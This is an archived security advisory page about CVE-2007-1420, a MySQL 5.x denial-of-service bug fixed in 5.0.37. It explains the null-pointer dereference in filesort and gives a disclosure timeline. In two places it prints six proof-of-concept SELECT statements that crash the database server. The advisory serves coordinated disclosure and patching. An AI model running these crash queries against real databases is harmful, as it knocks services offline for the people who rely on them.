SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   MySQL Vendors:   MySQL.com
MySQL Single Row Subselect Statements Let Remote Users Deny Service
SecurityTracker Alert ID:  1017746
SecurityTracker URL:  http://securitytracker.com/id/1017746
CVE Reference:   CVE-2007-1420   (Links to External Site)
Updated:  Mar 22 2007
Original Entry Date:  Mar 13 2007
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.x prior to 5.0.37
Description:   A vulnerability was reported in MySQL. A remote authenticated user can cause denial of service conditions.

A remote authenticated user (or a remote user with the ability to execute SELECT statements) can send a specially crafted statement to cause the target database service to crash.

Invoking a function that operates on strings in combination with a subselect call on information_schema tables and with additional sorting of the results with the ORDER BY clause can trigger a null-pointer dereference.

Some demonstration exploit statements are provided:

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

The vendor was notified on February 22, 2007.

S. Streichbier and B. Mueller of SEC-CONSULT discovered this vulnerability.

The original advisory is available at:

http://www.sec-consult.com/284.html

Impact:   A remote authenticated user can cause the target database service to crash.
Solution:   The vendor has issued a fixed version (5.0.37).
Vendor URL:  www.mysql.com/products/mysql/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 22 2008 (Red Hat Issues Fix) MySQL Single Row Subselect Statements Let Remote Users Deny Service
Red Hat has released a fix for Red Hat Enterprise Linux 5.



 Source Message Contents

Subject:  SEC Consult SA-20070309-0 :: MySQL 5 Single Row Subselect Denial

SEC-CONSULT Security Advisory < 20070309-0>
===========================================================================
                  title: MySQL 5 Single Row Subselect Denial of Service
                program: MySQL 5
     vulnerable version: < 5.0.37
                 impact: moderate
               homepage: http://www.mysql.com
                  found: 2007-02-10
                     by: S.Streichbier / SEC-CONSULT / www.sec-consult.com
                         B.Mueller     / SEC-CONSULT / www.sec-consult.com
         permanent link: http://www.sec-consult.com/284.html
===========================================================================

Vendor description:
---------------

MySQL, the most popular Open Source SQL database management system, is
developed, distributed, and supported by MySQL AB. MySQL AB is a
commercial company, founded by the MySQL developers. It is a second
generation Open Source company that unites Open Source values and
methodology with a successful business model.

[Source: http://www.mysql.com]

Vulnerability overview:
---------------

In order to exploit this vulnerability the attacker needs to execute
select statements on the database (e.g. SQL Injection).

Starting with version 5, MySQL provides access to the database metadata.
When using functions that operate on strings in combination with
subselects on information_schema tables and additional sorting of the
results with the ORDER BY clause, a null-pointer dereferencation takes
place causing a segmentation fault.

This allows an attacker to crash the MySQL database. We have not found
any code execution vector resulting from this bug, though further
research into this and related bugs may provide interesting results.

Vulnerability details:
---------------

When a subselect in a string function is used,
Item_singlerow_subselect::val_str() is called. As it is not expected
that the result of a single row subselect will be sorted, certain fields
(specifically sort->io_cache) in the allocated struct st_table are not
initalized. Yet, when "ORDER BY" is used in the query, filesort() is run
on the table. The actual segfault occurs in an error handling routine in
filesort():

libmysqld/filesort.cc:

111   FILESORT_INFO table_sort;
(...)
117   memcpy(&table_sort, &table->sort, sizeof(FILESORT_INFO));
120   outfile= table_sort.io_cache;
(..)
269  err:
(..)
276   if (my_b_inited(outfile))

include/my_sys.h:

503 #define my_b_inited(info) (info)->buffer

This leads to a null pointer dereference (EAX+8 or EBX+8 = 0x00000008 in
our test installations) crashing mysqld.


proof of concept:
---------------

Any string function can be used to exploit this vulnerability.

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY
1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM
information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY
1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY
1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY
1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY
1),1,'lol');

vulnerable versions:
---------------

All versions since the introduction of INFORMATION_SCHEMA tables seem to
be vulnerable to the Denial of Service attack. The version 5.0.37 fixes
this security issue.

vendor status:
---------------
vendor notified: 2007-02-22
vendor response: 2007-02-22
patch available: 2007-03-09
coordinated disclosure: 2007-03-09

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Stefan Streichsbier / @2007

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC